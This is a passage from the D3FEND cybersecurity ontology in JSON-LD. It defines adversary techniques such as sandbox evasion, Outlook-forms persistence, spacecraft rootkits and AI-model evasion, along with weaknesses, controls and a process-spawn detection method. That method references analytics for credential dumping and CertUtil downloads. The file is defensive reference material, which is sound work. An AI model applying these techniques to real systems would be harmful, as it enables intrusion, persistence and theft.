      "d3f:definition": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)",
      "rdfs:label": "Virtualization/Sandbox Evasion",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:DiscoveryTechnique"
        }
      ]
    },
    {
      "@id": "d3f:UnloadLibraryEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process unloads a dynamically linked library or module, reducing its memory footprint or functionality.",
      "rdfs:label": "Unload Library Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/module_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:N7d647429c0fc49898f84fb08bcf12dc3"
        },
        {
          "@id": "_:N69ae8a9f266c42d1b7fddbd8f7352d52"
        }
      ]
    },
    {
      "@id": "_:N7d647429c0fc49898f84fb08bcf12dc3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SharedLibraryFile"
      }
    },
    {
      "@id": "_:N69ae8a9f266c42d1b7fddbd8f7352d52",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LoadLibraryEvent"
      }
    },
    {
      "@id": "d3f:T1137.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:adds": {
        "@id": "d3f:OfficeApplicationFile"
      },
      "d3f:attack-id": "T1137.003",
      "d3f:definition": "Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)",
      "rdfs:label": "Outlook Forms",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:N84d7641450624d41a53d6fa613df3536"
        }
      ]
    },
    {
      "@id": "_:N84d7641450624d41a53d6fa613df3536",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:adds"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OfficeApplicationFile"
      }
    },
    {
      "@id": "d3f:T1657",
      "@type": "owl:Class",
      "d3f:attack-id": "T1657",
      "d3f:definition": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin)",
      "rdfs:label": "Financial Theft",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:IMP-0001",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0001",
      "d3f:definition": "Measures designed to mislead an adversary by manipulation, distortion, or falsification of evidence or information into a system to induce the adversary to react in a manner prejudicial to their interests. Threat actors may seek to deceive mission stakeholders (or even military decision makers) for a multitude of reasons. Telemetry values could be modified, attacks could be designed to intentionally mimic another threat actor's TTPs, and even allied ground infrastructure could be compromised and used as the source of communications to the spacecraft.",
      "rdfs:label": "Deception (or Misdirection) - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0001/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Deception (or Misdirection)"
    },
    {
      "@id": "d3f:TA0027",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Initial Access - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Initial Access"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_RA-5_2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Vulnerability Monitoring and Scanning | Update Vulnerabilities to Be Scanned",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:NetworkTrafficAnalysis"
      },
      "rdfs:label": "RA-5(2)"
    },
    {
      "@id": "d3f:DHCPEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving the Dynamic Host Configuration Protocol (DHCP), a UDP-based protocol used to dynamically assign IP addresses and configure network parameters, enabling devices to communicate efficiently on a network.",
      "rdfs:label": "DHCP Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/dhcp_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationLayerEvent"
        },
        {
          "@id": "d3f:UDPEvent"
        },
        {
          "@id": "_:Nf565b9b868b84cf9a3fece9a77255565"
        }
      ]
    },
    {
      "@id": "_:Nf565b9b868b84cf9a3fece9a77255565",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPNetworkTraffic"
      }
    },
    {
      "@id": "d3f:SystemStateImage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computing, a system image is a serialized copy of the entire state of a computer system stored in some non-volatile form, such as a binary executable file.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/System_image"
      },
      "rdfs:label": "System State Image",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/System_Image"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:StorageImage"
      },
      "skos:altLabel": "System Image"
    },
    {
      "@id": "d3f:Semi-supervisedInductiveLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSIL",
      "d3f:definition": "The goal of inductive learning is to infer the correct mapping from X to Y.",
      "d3f:kb-article": "## References\nSemi-Supervised Learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Semi-Supervised_Learning#Semi-supervised_learning).\n\nZhou, D., & Li, M. (2005). Semi-supervised learning by higher order regularization. In Proceedings of the 43rd Annual Meeting of the Association for Computational Linguistics (ACL) (pp. 1-9).  [Link](https://www.cs.sfu.ca/~anoop/papers/pdf/semisup_naacl.pdf).",
      "rdfs:label": "Semi-supervised Inductive Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:T1102.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1102.001",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.",
      "rdfs:label": "Dead Drop Resolver",
      "rdfs:subClassOf": {
        "@id": "d3f:T1102"
      }
    },
    {
      "@id": "d3f:CCI-002715_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically shuts the information system down, restarts the information system, and/or implements organization-defined security safeguards when integrity violations are discovered.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DriverLoadIntegrityChecking"
        },
        {
          "@id": "d3f:FileHashing"
        },
        {
          "@id": "d3f:PointerAuthentication"
        },
        {
          "@id": "d3f:TPMBootIntegrity"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002715"
    },
    {
      "@id": "d3f:AML.T0015",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0015",
      "d3f:definition": "Adversaries can [Craft Adversarial Data](/techniques/AML.T0043) that prevents an AI model from correctly identifying the contents of the data or [Generate Deepfakes](/techniques/AML.T0088) that fools an AI model expecting authentic data.\n\nThis technique can be used to evade a downstream task where AI is utilized. The adversary may evade AI-based virus/malware detection or network scanning towards the goal of a traditional cyber attack. AI model evasion through deepfake generation may also provide initial access to systems that use AI-based biometric authentication.",
      "rdfs:label": "Evade AI Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0015"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATLASImpactTechnique"
        },
        {
          "@id": "d3f:ATLASInitialAccessTechnique"
        }
      ],
      "skos:prefLabel": "Evade AI Model"
    },
    {
      "@id": "d3f:CombinationLock",
      "@type": "owl:Class",
      "d3f:definition": "A combination lock is a type of locking device in which a sequence of symbols, usually numbers, is used to open the lock.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Combination_lock"
      },
      "rdfs:label": "Combination Lock",
      "rdfs:seeAlso": "Federal Specification FL-L-2937",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalLock"
        },
        {
          "@id": "_:N4f9cd17ee7b146d181fef19e54ec5484"
        }
      ]
    },
    {
      "@id": "_:N4f9cd17ee7b146d181fef19e54ec5484",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Password"
      }
    },
    {
      "@id": "d3f:Reference-PLCKeySwitchMonitoring",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.dragos.com/blog/industry-news/value-of-plc-key-switch-monitoring/"
      },
      "d3f:kb-abstract": "Programmable Logic Controllers (PLC) and Safety Instrumented Systems (SIS) Controllers have historically included an external switch, generally in the form of a key, to perform maintenance and troubleshooting. The key switch has become commonplace for automation engineers and technicians who maintain and support these systems and understand the importance of the little switch in overall device operation and affects the underlying process.",
      "d3f:kb-author": "DRAGOS",
      "d3f:kb-reference-of": {
        "@id": "d3f:OperatingModeMonitoring"
      },
      "d3f:kb-reference-title": "Value of PLC Key Switch Monitoring to Keep Critical Systems More Secure",
      "rdfs:label": "Reference - Value of PLC Key Switch Monitoring to Keep Critical Systems More Secure"
    },
    {
      "@id": "d3f:ApplicationRestartEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an application is sequentially stopped and started, typically to refresh its state, apply updates, or resolve issues while preserving its availability.",
      "rdfs:label": "Application Restart Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationEvent"
        },
        {
          "@id": "_:Na03b7432d3c7409ba6774e8657389c8f"
        },
        {
          "@id": "_:N988a424f8e0c4501b6fc371585bf6757"
        }
      ]
    },
    {
      "@id": "_:Na03b7432d3c7409ba6774e8657389c8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationStopEvent"
      }
    },
    {
      "@id": "_:N988a424f8e0c4501b6fc371585bf6757",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:precedes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationStartEvent"
      }
    },
    {
      "@id": "d3f:T1451",
      "@type": "owl:Class",
      "d3f:attack-id": "T1451",
      "d3f:definition": "Adversaries may gain access to mobile devices through transfers or swaps from victims’ phone numbers to adversary-controlled SIM cards and mobile devices.(Citation: ATT SIM Swap Scams)(Citation: Verizon SIM Swapping)",
      "rdfs:label": "SIM Card Swap - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileInitialAccessTechnique"
      },
      "skos:prefLabel": "SIM Card Swap"
    },
    {
      "@id": "d3f:CWE-529",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-529",
      "d3f:definition": "The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere.",
      "rdfs:label": "Exposure of Access Control List Files to an Unauthorized Control Sphere",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:T1058",
      "@type": "owl:Class",
      "d3f:attack-id": "T1058",
      "d3f:definition": "Windows stores local service configuration information in the Registry under <code>HKLM\\SYSTEM\\CurrentControlSet\\Services</code>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1086), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1574.011",
      "rdfs:label": "Service Registry Permissions Weakness",
      "rdfs:seeAlso": {
        "@id": "d3f:T1574.011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1541",
      "@type": "owl:Class",
      "d3f:attack-id": "T1541",
      "d3f:definition": "Adversaries may abuse Android's `startForeground()` API method to maintain continuous sensor access. Beginning in Android 9, idle applications running in the background no longer have access to device sensors, such as the camera, microphone, and gyroscope.(Citation: Android-SensorsOverview) Applications can retain sensor access by running in the foreground, using Android’s `startForeground()` API method. This informs the system that the user is actively interacting with the application, and it should not be killed. The only requirement to start a foreground service is showing a persistent notification to the user.(Citation: Android-ForegroundServices)",
      "rdfs:label": "Foreground Persistence - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileDefenseEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKMobilePersistenceTechnique"
        }
      ],
      "skos:prefLabel": "Foreground Persistence"
    },
    {
      "@id": "d3f:EX-0010.03",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0010.03",
      "d3f:definition": "A rootkit hides the presence and activity of other malicious components by interposing on the mechanisms that report system state. On spacecraft this can occur within flight software processes, at OS kernel level, inside separation kernels/hypervisors, or down in system firmware where drivers and initialization routines run. Techniques include API and syscall hooking, patching message queues and inter-process communication paths, altering task lists and scheduler views, filtering telemetry packets and event logs, and rewriting sensor or health values before they are recorded or downlinked. Rootkits may also hook command handlers and gateways so certain opcodes, timetags, or sources are silently accepted or ignored while external observers see normal acknowledgments. Because many missions rely on deterministic procedures and limited observability, even small alterations to reporting can make malicious actions appear as plausible mode transitions or benign anomalies. Persistence often pairs with the concealment layer, with the rootkit reinjecting companions after resets or rebuilds by monitoring for specific files, tables, or image loads and modifying them on the fly.",
      "d3f:modifies": [
        {
          "@id": "d3f:BootSector"
        },
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:KernelModule"
        },
        {
          "@id": "d3f:SystemFirmware"
        }
      ],
      "rdfs:label": "Rootkit - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/03/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0010"
        },
        {
          "@id": "_:Na6333df5c1564ae393ba86909c169ebb"
        },
        {
          "@id": "_:Nc8ec17c87c4c4245b7f8e4b9af3ab1a8"
        },
        {
          "@id": "_:N86f029d1356a4efbade97a985464a77e"
        },
        {
          "@id": "_:N2bdd31cafd0a4cf793120c3d4903cde3"
        }
      ],
      "skos:prefLabel": "Rootkit"
    },
    {
      "@id": "_:Na6333df5c1564ae393ba86909c169ebb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootSector"
      }
    },
    {
      "@id": "_:Nc8ec17c87c4c4245b7f8e4b9af3ab1a8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "_:N86f029d1356a4efbade97a985464a77e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:KernelModule"
      }
    },
    {
      "@id": "_:N2bdd31cafd0a4cf793120c3d4903cde3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemFirmware"
      }
    },
    {
      "@id": "d3f:CWE-1312",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1312",
      "d3f:definition": "The firewall in an on-chip fabric protects the main addressed region, but it does not protect any mirrored memory or memory-mapped-IO (MMIO) regions.",
      "rdfs:label": "Missing Protection for Mirrored Regions in On-Chip Fabric Firewall",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:Reference-FirmwareBehaviorAnalysisConFirm",
      "@type": [
        "owl:NamedIndividual",
        "d3f:AcademicPaperReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "http://sites.nyuad.nyu.edu/moma/pdfs/pubs/C22.pdf"
      },
      "d3f:kb-abstract": "The modernization of various critical infrastructure components has dictated the use of microprocessor-based\nembedded control systems in critical applications. It is often\ninfeasible, however, to employ the same level of security measures used in general purpose computing systems, due to the stringent\nperformance and resource constraints of embedded devices. Furthermore, as software relies on the firmware for proper operation,\nno software-level technique can detect malicious behavior of\nthe firmware. In this work, we propose ConFirm, a low-cost\ntechnique to detect malicious modifications in the firmware\nof embedded systems by measuring the number of low-level hardware events that occur during the execution of the firmware.",
      "d3f:kb-author": "Xueyang Wang, Charalambos Konstantinou, Michail Maniatakos, Ramesh Karri",
      "d3f:kb-organization": "Department of Electrical and Computer Engineering, Polytechnic School of Engineering, New York University and Department of Electrical and Computer Engineering, New York University Abu Dhabi",
      "d3f:kb-reference-of": {
        "@id": "d3f:FirmwareBehaviorAnalysis"
      },
      "d3f:kb-reference-title": "ConFirm: Detecting Firmware Modifications in Embedded Systems\nusing Hardware Performance Counters",
      "rdfs:label": "Reference - Firmware Behavior Analysis ConFirm"
    },
    {
      "@id": "d3f:T1016.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1016.002",
      "d3f:definition": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.",
      "rdfs:label": "Wi-Fi Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:T1016"
      }
    },
    {
      "@id": "d3f:T1573",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1573",
      "d3f:definition": "Adversaries may employ an encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      },
      "rdfs:label": "Encrypted Channel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N97748fe7b5e54544895667accd99a544"
        }
      ],
      "skos:altLabel": [
        "Custom Command and Control Protocol",
        "Custom Cryptographic Protocol",
        "Multilayer Encryption"
      ]
    },
    {
      "@id": "_:N97748fe7b5e54544895667accd99a544",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetEncryptedTraffic"
      }
    },
    {
      "@id": "d3f:OutboundInternetRPCTraffic",
      "@type": "owl:Class",
      "d3f:definition": "Outbound internet RPC traffic is RPC traffic that is: (a) on an outgoing connection initiated from a host within a network to a host outside the network, and (b) using a standard RPC protocol.",
      "rdfs:label": "Outbound Internet RPC Traffic",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Internetworking"
        },
        {
          "@id": "dbr:Remote_procedure_call"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OutboundInternetNetworkTraffic"
        },
        {
          "@id": "d3f:OutboundNetworkTraffic"
        },
        {
          "@id": "d3f:RPCNetworkTraffic"
        }
      ]
    },
    {
      "@id": "d3f:AML.TA0011",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0011",
      "d3f:definition": "The adversary is trying to manipulate, interrupt, erode confidence in, or destroy your AI systems and data.\n\nImpact consists of techniques that adversaries use to disrupt availability or compromise integrity by manipulating business and operational processes.\nTechniques used for impact can include destroying or tampering with data.\nIn some cases, business processes can look fine, but may have been altered to benefit the adversaries' goals.\nThese techniques might be used by adversaries to follow through on their end goal or to provide cover for a confidentiality breach.",
      "rdfs:label": "Impact - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0011"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Impact"
    },
    {
      "@id": "d3f:Reference-RedHatEnterpriseLinux8SecurityTechnicalImplementationGuide",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.stigviewer.com/stig/red_hat_enterprise_linux_8/"
      },
      "d3f:kb-abstract": "Red Hat Enterprise Linux 8 Security Guidelines",
      "d3f:kb-reference-of": {
        "@id": "d3f:ApplicationConfigurationHardening"
      },
      "d3f:kb-reference-title": "Red Hat Enterprise Linux 8 Security Technical Implementation Guide",
      "rdfs:label": "Reference - Red Hat Enterprise Linux 8 Security Technical Implementation Guide"
    },
    {
      "@id": "d3f:OpticalDiscImage",
      "@type": "owl:Class",
      "d3f:definition": "An optical disc image (or ISO image, from the ISO 9660 file system used with CD-ROM media) is a disk image that contains everything that would be written to an optical disc, disk sector by disc sector, including the optical disc file system.",
      "rdfs:isDefinedBy": {
        "@id": "https://en.wikipedia.org/wiki/Optical_disc_image"
      },
      "rdfs:label": "Optical Disc Image",
      "rdfs:seeAlso": {
        "@id": "https://dbpedia.org/resource/Optical_disc_image"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DiskImage"
      }
    },
    {
      "@id": "d3f:Reference-GS_BufferSecurityCheck_MicrosoftDocs",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/cpp/build/reference/gs-buffer-security-check?view=vs-2019"
      },
      "d3f:kb-abstract": "",
      "d3f:kb-author": "",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft Docs",
      "d3f:kb-reference-of": {
        "@id": "d3f:StackFrameCanaryValidation"
      },
      "d3f:kb-reference-title": "/GS (Buffer Security Check)",
      "rdfs:label": "Reference - /GS (Buffer Security Check) - Microsoft Docs"
    },
    {
      "@id": "d3f:ProcessSpawnAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessSpawnAnalysis"
      ],
      "d3f:analyzes": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:Process"
        }
      ],
      "d3f:d3fend-id": "D3-PSA",
      "d3f:definition": "Analyzing spawn arguments or attributes of a process to detect processes that are unauthorized.",
      "d3f:kb-article": "## How it works\nProcess attributes are established when an operating system spawns a new process. These attributes are analyzed to look for the presence or absence of specific values or patterns.\n\nSome attributes of interest are:\n - user\n - process name\n - image path\n - security content\n\n## Considerations\n\n - Attackers can spoof the parent process identifier (PPID), which could bypass this defense to allow execution of a malicious process from an arbitrary parent process.\n - Attackers could have legitimately compromised any of the process properties, such as the user, to make the execution appear legitimate.\n - Location: If the full image path is not checked, there could be a conflict with an executable that appears earlier due to resolution involving the system environment path/classpath variable.\n - Parsing issues: If the raw command from a shell is analyzed, rather than the actual function call, it is important to identify the actual command  being run from its arguments.  In Windows, services with unquoted file paths containing spaces will try to use the first token as the executable and the rest as arguments -- and shift tokens to the executable until a valid one is found.\n - Some [operating systems](/dao/artifact/d3f:OperatingSystem) can spawn processes without forking.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-ActiveDirectoryDumpingViaNTDSUtil_MITRE"
        },
        {
          "@id": "d3f:Reference-CommandLineUsageOfArchivingSoftware_MITRE"
        },
        {
          "@id": "d3f:Reference-CreateRemoteProcessViaWMIC_MITRE_Other"
        },
        {
          "@id": "d3f:Reference-CredentialDumpingViaMimikatz_MITRE"
        },
        {
          "@id": "d3f:Reference-HostDiscoveryCommands_MITRE"
        },
        {
          "@id": "d3f:Reference-LsassProcessDumpViaProcdump_MITRE"
        },
        {
          "@id": "d3f:Reference-PowershellExecution_MITRE"
        },
        {
          "@id": "d3f:Reference-RunDLL32.exeMonitoring_MITRE"
        },
        {
          "@id": "d3f:Reference-Squiblydoo_MITRE"
        },
        {
          "@id": "d3f:Reference-SuspiciousArguments_MITRE"
        },
        {
          "@id": "d3f:Reference-SuspiciousRunLocations_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-04-001%3AShadowCopyDeletion_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-05-003%3ARareLolBASCommandLines_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-08-001%3ANTFSAlternateDataStreamExecution-SystemUtilities_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-003%3AIndicatorBlocking-DriverUnloaded_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-09-004%3ACredentialsInFiles%26Registry_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-001%3ABootOrLogonInitializationScripts_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-003%3ADLLInjectionWithMavinject_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-005%3AClearPowershellConsoleCommandHistory_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-006%3ALocalPermissionGroupDiscovery_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-007%3ANetworkShareConnectionRemoval_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-008%3AMSBuildAndMsxsl_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2020-11-009%3ACompiledHTMLAccess_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-002%3AUnusuallyLongCommandLineStrings_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-003%3AClearingWindowsLogsWithWevtutil_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-004%3AUnusualChildProcessForSpoolsv.ExeOrConnhost.Exe_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-006%3AUnusualChildProcessSpawnedUsingDDEExploit_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-007%3ADetectingTamperingOfWindowsDefenderCommandPrompt_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-008%3ADisableUAC_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-01-009%3ADetectingShadowCopyDeletionViaVssadmin.exe_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-02-001%3AWebshell-IndicativeProcessTree_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-04-001%3ACommonWindowsProcessMasquerading_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-001%3AAttemptToAddCertificateToUntrustedStore_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-002%3ABatchFileWriteToSystem32_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-003%3ABCDEditFailureRecoveryModification_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-004%3ABITSJobPersistence_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-005%3ABITSAdminDownloadFile_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-006%3ACertUtilDownloadWithURLCacheAndSplitArguments_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-007%3ACertUtilDownloadWithVerifyCtlAndSplitArguments_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-008%3ACertutilExeCertificateExtraction_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-009%3ACertUtilWithDecodeArgument_MITRE"
        },
        {
          "@id": "d3f:Reference-CAR-2021-05-010%3ACreateLocalAdminAccountsUsingNetExe_MITRE"
        }
      ],
      "rdfs:label": "Process Spawn Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessAnalysis"
        },
        {
          "@id": "_:Nc9bd65885ae44b79991b34710675a277"
        },
        {
          "@id": "_:N23456c686fdd4bc19fa4e523a23c65bd"
        }
      ]
    },
    {
      "@id": "_:Nc9bd65885ae44b79991b34710675a277",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
